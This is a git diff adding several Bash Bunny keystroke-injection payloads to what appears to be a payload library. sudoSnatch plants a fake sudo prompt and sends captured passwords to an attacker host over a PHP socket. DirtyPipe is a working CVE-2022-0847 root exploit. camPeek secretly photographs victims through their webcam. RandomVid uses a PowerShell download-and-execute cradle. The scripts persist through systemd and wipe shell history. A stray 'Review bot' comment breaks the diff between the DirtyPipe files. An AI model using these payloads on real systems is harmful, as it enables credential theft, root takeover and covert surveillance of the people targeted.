diff --git a/payloads/library/credentials/sudoSnatch/README.md b/payloads/library/credentials/sudoSnatch/README.md
new file mode 100644
index 00000000..856ab92e
--- /dev/null
+++ b/payloads/library/credentials/sudoSnatch/README.md
@@ -0,0 +1,48 @@
+## About:
+* Title: sudoSnatch
+* Description: sudoSnatch grabs plain text passwords remotely/locally.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Credentials
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID, Storage
+
+## sudoSnatch: sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally.
+
+### Features:
+* Plain text passwords.
+* Detailed password logs.
+* Persistent
+* Autostart payload on boot.
+
+### Workflow:
+* Injecting payload on target's system.
+* Checks whether internet is connected to the target system.
+* If internet is connected then it sends clear text passwords to attacker.
+
+### Changes to be made in payload.sh:
+* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `10`.
+* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `14`.
+
+### LED Status:
+* `SETUP` : MAGENTA
+* `ATTACK` : YELLOW
+* `FINISH` : GREEN
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| -------------- | ----------------------------- |
+| payload.txt | /payloads/switch1/ |
+| payload.sh | /payloads/ |
+| shell | /payloads/library/sudoSnatch/ |
+| systemMgr | /payloads/library/sudoSnatch/ |
+
+* Note: Create directory named `sudoSnatch` in `/payloads/library/`
+### Usage:
+1. Inject payload into target's system.
+2. Start netcat listner on attacking system:
+
+* `nc -l -p ` use this command to fetch passwords.
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/credentials/sudoSnatch/payload.sh b/payloads/library/credentials/sudoSnatch/payload.sh
new file mode 100644
index 00000000..a11c2654
--- /dev/null
+++ b/payloads/library/credentials/sudoSnatch/payload.sh
@@ -0,0 +1,23 @@
+#!/bin/bash
+unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
+mkdir /var/tmp/.system
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+cp -r $mntt/payloads/library/sudoSnatch/systemMgr /var/tmp/.system/
+chmod +x /var/tmp/.system/systemMgr
+touch /var/tmp/.system/sysLog
+echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
+chmod +x /var/tmp/.system/systemBus
+mkdir -p ~/.config/systemd/user
+echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
+echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
+chmod +x /var/tmp/.system/reboot
+echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service
+systemctl --user daemon-reload
+systemctl --user enable --now systemBUS.service
+systemctl --user start --now systemBUS.service
+systemctl --user enable --now reboot.service
+systemctl --user start --now reboot.service
+cp -r $mntt/payloads/library/sudoSnatch/shell /tmp/
+chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell
diff --git a/payloads/library/credentials/sudoSnatch/payload.txt b/payloads/library/credentials/sudoSnatch/payload.txt
new file mode 100644
index 00000000..894b67c6
--- /dev/null
+++ b/payloads/library/credentials/sudoSnatch/payload.txt
@@ -0,0 +1,56 @@
+# Title: sudoSnatch
+# Description: sudoSnatch grabs plain text passwords remotely/locally.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Credentials
+# Target: Unix-like operating systems with systemd.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 1400
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/payload.sh
+Q ENTER
+Q STRING /tmp/./payload.sh
+Q ENTER
+Q DELAY 5000
+Q STRING rm /tmp/payload.sh
+Q ENTER
+Q DELAY 500
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH
diff --git a/payloads/library/credentials/sudoSnatch/shell b/payloads/library/credentials/sudoSnatch/shell
new file mode 100644
index 00000000..eb95bf5d
--- /dev/null
+++ b/payloads/library/credentials/sudoSnatch/shell
@@ -0,0 +1,12 @@
+#!/bin/bash
+ls -a ~/ | grep 'zshrc' &> /dev/null
+if [ $? = 0 ]; then
+ echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc
+ echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.zshrc
+fi
+
+ls -a ~/ | grep 'bashrc' &> /dev/null
+if [ $? = 0 ]; then
+ echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc
+ echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.bashrc
+fi
diff --git a/payloads/library/credentials/sudoSnatch/systemMgr b/payloads/library/credentials/sudoSnatch/systemMgr
new file mode 100644
index 00000000..36c6b4ea
--- /dev/null
+++ b/payloads/library/credentials/sudoSnatch/systemMgr
@@ -0,0 +1,5 @@
+#!/bin/bash
+echo -n "[sudo] password for $(whoami):"
+IFS="" read -s pass
+echo -e "Timestamp=[$(date)] \t User=[$(whoami)] \t Password=[$pass]" >> /var/tmp/.system/sysLog
+echo -e "\nSorry, try again."
diff --git a/payloads/library/execution/DirtyPipe/README.md b/payloads/library/execution/DirtyPipe/README.md
new file mode 100644
index 00000000..c115edfb
--- /dev/null
+++ b/payloads/library/execution/DirtyPipe/README.md
@@ -0,0 +1,24 @@
+## About:
+* Title: DirtyPipe
+* Description: Exploit for a new Linux vulnerability known as 'Dirty Pipe(CVE-2022-0847)' allows local users to gain root privileges.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Execution
+* Target: Linux operating systems.
+* Attackmodes: HID, Storage
+
+## DirtyPipe: Exploit for a new Linux vulnerability known as 'Dirty Pipe(CVE-2022-0847)' allows local users to gain root privileges. The vulnerability is tracked as CVE-2022-0847 and allows a non-privileged user to inject and overwrite data in read-only files, including SUID processes that run as root.
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| -------------- | ----------------------------- |
+| payload.txt | /payloads/ |
+| dirtypipe.c | /payloads/library/ |
+
+### LED Status:
+* `SETUP` : MAGENTA
+* `ATTACK` : YELLOW
+* `FINISH` : GREEN
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/execution/DirtyPipe/dirtypipe.c b/payloads/library/execution/DirtyPipe/dirtypipe.c
new file mode 100644
index 00000000..cd6295d6
--- /dev/null
+++ b/payloads/library/execution/DirtyPipe/dirtypipe.c
@@ -0,0 +1,181 @@
+#define _GNU_SOURCE
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#ifndef PAGE_SIZE
+#define PAGE_SIZE 4096
+#endif
+
+// small (linux x86_64) ELF file matroshka doll that does;
+// fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC);
+// write(fd, elfcode, elfcode_len)
+// chmod("/tmp/sh", 04755)
+// close(fd);
+// exit(0);
+//
+// the dropped ELF simply does:
+// setuid(0);
+// setgid(0);
+// execve("/bin/sh", ["/bin/sh", NULL], [NULL]);
+unsigned char elfcode[] = {
+ /*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
+ 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02,
+ 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,
+ 0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2,
+ 0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f,
+ 0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d,
+ 0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,
+ 0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff,
+ 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d,
+ 0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e,
+ 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38,
+ 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
+ 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69,
+ 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a,
+ 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00,
+ 0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0,
+ 0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00,
+ 0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00
+};
+
+/**
+ * Create a pipe where all "bufs" on the pipe_inode_info ring have the
+ * PIPE_BUF_FLAG_CAN_MERGE flag set.
+ */
+static void prepare_pipe(int p[2])
+{
+ if (pipe(p)) abort();
+
+ const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
+ static char buffer[4096];
+
+ /* fill the pipe completely; each pipe_buffer will now have
+ the PIPE_BUF_FLAG_CAN_MERGE flag */
+ for (unsigned r = pipe_size; r > 0;) {
+ unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
+ write(p[1], buffer, n);
+ r -= n;
+ }
+
+ /* drain the pipe, freeing all pipe_buffer instances (but
+ leaving the flags initialized) */
+ for (unsigned r = pipe_size; r > 0;) {
+ unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
+ read(p[0], buffer, n);
+ r -= n;
+ }
+
+ /* the pipe is now empty, and if somebody adds a new
+ pipe_buffer without initializing its "flags", the buffer
+ will be mergeable */
+}
+
+int hax(char *filename, long offset, uint8_t *data, size_t len) {
+ /* open the input file and validate the specified offset */
+ const int fd = open(filename, O_RDONLY); // yes, read-only! :-)
+ if (fd < 0) {
+ perror("open failed");
+ return -1;
+ }
+
+ struct stat st;
+ if (fstat(fd, &st)) {
+ perror("stat failed");
+ return -1;
+ }
+
+ /* create the pipe with all flags initialized with
+ PIPE_BUF_FLAG_CAN_MERGE */
+ int p[2];
+ prepare_pipe(p);
+
+ /* splice one byte from before the specified offset into the
+ pipe; this will add a reference to the page cache, but
+ since copy_page_to_iter_pipe() does not initialize the
+ "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
+ --offset;
+ ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
+ if (nbytes < 0) {
+ perror("splice failed");
+ return -1;
+ }
+ if (nbytes == 0) {
+ fprintf(stderr, "short splice\n");
+ return -1;
+ }
+
+ /* the following write will not create a new pipe_buffer, but
+ will instead write into the page cache, because of the
+ PIPE_BUF_FLAG_CAN_MERGE flag */
+ nbytes = write(p[1], data, len);
+ if (nbytes < 0) {
+ perror("write failed");
+ return -1;
+ }
+ if ((size_t)nbytes < len) {
+ fprintf(stderr, "short write\n");
+ return -1;
+ }
+
+ close(fd);
+
+ return 0;
+}
+
+int main(int argc, char **argv) {
+ if (argc != 2) {
+ fprintf(stderr, "Usage: %s SUID\n", argv[0]);
+ return EXIT_FAILURE;
+ }
+
+ char *path = argv[1];
+ uint8_t *data = elfcode;
+
+ int fd = open(path, O_RDONLY);
+ uint8_t *orig_bytes = malloc(sizeof(elfcode));
+ lseek(fd, 1, SEEK_SET);
+ read(fd, orig_bytes, sizeof(elfcode));
+ close(fd);
+
+ printf("[+] hijacking suid binary..\n");
+ if (hax(path, 1, elfcode, sizeof(elfcode)) != 0) {
+ printf("[~] failed\n");
+ return EXIT_FAILURE;
+ }
+
+ printf("[+] dropping suid shell..\n");
+ system(path);
+
+ printf("[+] restoring suid binary..\n");
+ if (hax(path, 1, orig_bytes, sizeof(elfcode)) != 0) {
+ printf("[~] failed\n");
+ return EXIT_FAILURE;
+ }
+
+ printf("[+] popping root shell.. (dont forget to clean up /tmp/sh ;))\n");
+ system("/tmp/sh");
+
+ return EXIT_SUCCESS;
+}
diff --git a/payloads/library/execution/DirtyPipe/payload.txt b/payloads/library/execution/DirtyPipe/payload.txt
new file mode 100644
index 00000000..e432e46e
--- /dev/null
+++ b/payloads/library/execution/DirtyPipe/payload.txt
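Review bot: The snapshot of the target's original bytes in `main` is taken with unchecked calls (`int fd = open(path, O_RDONLY);`, `malloc`, `lseek`, `read(fd, orig_bytes, sizeof(elfcode));`), so if the open fails or the read comes back short, `orig_bytes` holds uninitialized heap memory and the later "restoring suid binary" step writes that garbage into the page cache of the file named on the command line — with `/bin/bash` as the argument in the accompanying payload.txt, that leaves the machine with an unusable shell and no way back. The program should refuse to touch the file at all unless the snapshot is complete; replacing the bare `read(...)` line with `if (fd < 0 || orig_bytes == NULL || read(fd, orig_bytes, sizeof(elfcode)) != (ssize_t)sizeof(elfcode)) { perror("snapshot failed"); return EXIT_FAILURE; }` before the first `hax()` call does that. Separately, `data` is assigned from `elfcode` and never used, and the file carries no attribution or licence header although it appears to be a copy of a published proof of concept; both belong in the same commit.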
@@ -0,0 +1,82 @@
+# Title: DirtyPipe
+# Description: Exploit for a new Linux vulnerability known as 'Dirty Pipe(CVE-2022-0847)' allows local users to gain root privileges.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: Linux operating systems.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 100
+Q STRING HISTSIZE=0
+Q ENTER
+Q DELAY 100
+Q STRING rm -f '$HISTFILE'
+Q ENTER
+Q DELAY 100
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering and executing exploit]
+Q STRING cp -r '$mntt'/payloads/library/dirtypipe.c /tmp/
+Q ENTER
+Q DELAY 100
+Q STRING gcc /tmp/dirtypipe.c -o /tmp/dirtypipe
+Q ENTER
+Q DELAY 1000
+Q STRING chmod +x /tmp/dirtypipe
+Q ENTER
+Q STRING /tmp/./dirtypipe /bin/bash
+Q ENTER
+Q DELAY 500
+Q STRING sudo su
+Q ENTER
+Q CTRL-ALT t
+Q DELAY 500
+Q STRING rm /tmp/dirtypipe
+Q ENTER
+Q DELAY 100
+Q STRING rm /tmp/dirtypipe.c
+Q ENTER
+Q DELAY 200
+
+# [Unmounting BashBunny]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 100
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 100
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH
diff --git a/payloads/library/execution/camPeek/README.md b/payloads/library/execution/camPeek/README.md
new file mode 100644
index 00000000..4c6863c5
--- /dev/null
+++ b/payloads/library/execution/camPeek/README.md
@@ -0,0 +1,55 @@
+## About:
+* Title: camPeek
+* Description: camPeek payload peeks through targets web cam and capture images and stores them in bunny.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Execution
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID, Storage
+
+## CamPeek: camPeek payload is divided into two modules, First peeks through targets web cam and capture images and Second stores them in bunny.
+
+### Features:
+* Robust Payload for capturing targets images.
+* No additional dependencies required.
+* Persistent.
+* Autostart payload on boot.
+
+### Payload:
+* Payload is divided into two modules:
+1) Deployment: In this stage payload is deployed in targets system.
+2) Exfiltration: Storing saved loot from targets system in bunny.
+
+### Payload Script's Workflow:
+* Stop storing histroy.
+* Grep bunny's mount point of bunny.
+* Creating hidden directory in /var/tmp/..... for obfuscation.
+* Copying ffmpeg and image capturing mechanism in target's system.
+* Creating systemd service for persistance and triggering mechanism for autostart.
+
+### Changes to be made:
+* Change time interval of capturing image, more the time interval target gets less suspicious, default time interval is 120 secs. Make changes in `systemBus` on line number `4`.
+
+### LED Status:
+* `SETUP` : MAGENTA
+* `ATTACK` : YELLOW
+* `FINISH` : GREEN
+
+### Note:
+* Download pre compiled static build of ffmpeg from: https://github.com/drapl0n/temp/releases/download/ffmpeg/ffmpeg and move it in camPeek directory.
+* Due to big size of binary, it is not provided in this repo.
+* Craete directory name `camPeek` in `/loot/` for storing captured images.
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| -------------- | ----------------------------- |
+| switch1/payload.txt | /payloads/switch1/ |
+| switch2/payload.txt | /payloads/switch2/ |
+| camPeek/ | /payloads/libray/ |
+
+### Usage:
+1. Deploy first payload during absence of target using `switch1`.
+2. Execute second payload during absence of target to store captured images in bunny using `switch2`.
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/execution/camPeek/camPeek/payload.sh b/payloads/library/execution/camPeek/camPeek/payload.sh
new file mode 100644
index 00000000..3759ce12
--- /dev/null
+++ b/payloads/library/execution/camPeek/camPeek/payload.sh
@@ -0,0 +1,18 @@
+#!/bin/bash
+unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
+mkdir /var/tmp/.system
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+cp -r $mntt/payloads/library/camPeek/ffmpeg /var/tmp/.system/
+chmod +x /var/tmp/.system/ffmpeg
+mkdir /var/tmp/.system/sysLog
+cp -r $mntt/payloads/library/camPeek/systemBus /var/tmp/.system/systemBus
+chmod +x /var/tmp/.system/systemBus
+mkdir -p ~/.config/systemd/user
+echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
+systemctl --user daemon-reload
+systemctl --user enable --now systemBUS.service
+systemctl --user start --now systemBUS.service
+cp -r $mntt/payloads/library/camPeek/shell /tmp/
+chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell
diff --git a/payloads/library/execution/camPeek/camPeek/shell b/payloads/library/execution/camPeek/camPeek/shell
new file mode 100644
index 00000000..2b46e3d3
--- /dev/null
+++ b/payloads/library/execution/camPeek/camPeek/shell
@@ -0,0 +1,12 @@
+#!/bin/bash
+ls -a ~/ | grep 'zshrc' &> /dev/null
+if [ $? = 0 ]; then
+ echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc
+ echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.zshrc
+fi
+
+ls -a ~/ | grep 'bashrc' &> /dev/null
+if [ $? = 0 ]; then
+ echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc
+ echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.bashrc
+fi
diff --git a/payloads/library/execution/camPeek/camPeek/systemBus b/payloads/library/execution/camPeek/camPeek/systemBus
new file mode 100644
index 00000000..f23d223c
--- /dev/null
+++ b/payloads/library/execution/camPeek/camPeek/systemBus
@@ -0,0 +1,5 @@
+while true;
+do
+ /var/tmp/.system/./ffmpeg -f video4linux2 -i /dev/video0 -vframes 1 -video_size 640x480 /var/tmp/.system/sysLog/$(date +%Y%m%d-%H%M%S).png
+ sleep 120
+done
diff --git a/payloads/library/execution/camPeek/switch1/payload.txt b/payloads/library/execution/camPeek/switch1/payload.txt
new file mode 100644
index 00000000..c251c817
--- /dev/null
+++ b/payloads/library/execution/camPeek/switch1/payload.txt
@@ -0,0 +1,56 @@
+# Title: camPeek
+# Description: camPeek payload peeks through targets web cam and capture images.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: GNU/Linux operating systems with systemd.
+# Attackmodes: HID, Storage.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/library/camPeek/payload.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/payload.sh
+Q ENTER
+Q STRING /tmp/./payload.sh
+Q ENTER
+Q DELAY 12000
+Q STRING rm /tmp/payload.sh
+Q ENTER
+Q DELAY 500
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH
diff --git a/payloads/library/execution/camPeek/switch2/payload.txt b/payloads/library/execution/camPeek/switch2/payload.txt
new file mode 100644
index 00000000..b478df1f
--- /dev/null
+++ b/payloads/library/execution/camPeek/switch2/payload.txt
@@ -0,0 +1,43 @@
+# Title: camPeek
+# Description: camPeek payload's exfilteration module to move captured images to bunny.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: GNU/Linux operating systems with systemd.
+# Attackmodes: HID, Storage.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+# create directory named camPeek in /loot/
+Q STRING mv /var/tmp/.system/sysLog/* '$mntt'/loot/camPeek/ \&
+Q ENTER
+Q STRING disown \&\& exit
+Q ENTER
diff --git a/payloads/library/general/Win_PoSH_RandomVid/payload.txt b/payloads/library/general/Win_PoSH_RandomVid/payload.txt
new file mode 100644
index 00000000..1d2e874e
--- /dev/null
+++ b/payloads/library/general/Win_PoSH_RandomVid/payload.txt
@@ -0,0 +1,33 @@
+#!/bin/bash
+# Title: Random Video
+# Description: Downloads a list of vids from YouTube. Then pick a random one then opens it.
+# Author: Cribbit
+# Version: 1.0
+# Category: General
+# Target: Windows (Powershell 5.1+)
+# Attackmodes: RNDIS_ETHERNET HID
+
+LED SETUP
+ATTACKMODE RNDIS_ETHERNET HID
+
+GET SWITCH_POSITION
+GET HOST_IP
+
+
+cd /root/udisk/payloads/$SWITCH_POSITION/
+
+# starting server
+LED SPECIAL
+
+# disallow outgoing dns requests so server starts immediately
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python -m SimpleHTTPServer 80 &
+
+# wait until port is listening
+while ! nc -z localhost 80; do sleep 0.2; done
+
+# attack commences
+LED ATTACK
+QUACK DELAY 300
+RUN WIN "powershell -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\""
+LED FINISH
\ No newline at end of file
diff --git a/payloads/library/general/Win_PoSH_RandomVid/readme.md b/payloads/library/general/Win_PoSH_RandomVid/readme.md
new file mode 100644
index 00000000..7008f5fb
--- /dev/null
+++ b/payloads/library/general/Win_PoSH_RandomVid/readme.md
@@ -0,0 +1,24 @@
+# Random Video
+- Author: Cribbit
+- Version: 1.0
+- Tested on: Windows 10 (Powershell 5.1+)
+- Category: General
+- Attackmode: HID & RNDIS_ETHERNET
+- Extensions: Run
+
+## Change Log
+| Version | Changes |
+| ------- | --------------- |
+| 1.0 | Initial release |
+
+## Description
+Downloads a list of Hak5 vids from YouTube (about 15 in the rss feed).
+
+Then pick one at random, then opens it in the browser.
+
+## Colours
+| Status | Colour | Description |
+| -------- | ----------------------------- | --------------------------- |
+| SETUP | Magenta solid | Setting attack mode |
+| ATTACK | Yellow single blink | Injecting Powershell script |
+| FINISHED | Green blink followed by SOLID | Injection finished |
\ No newline at end of file
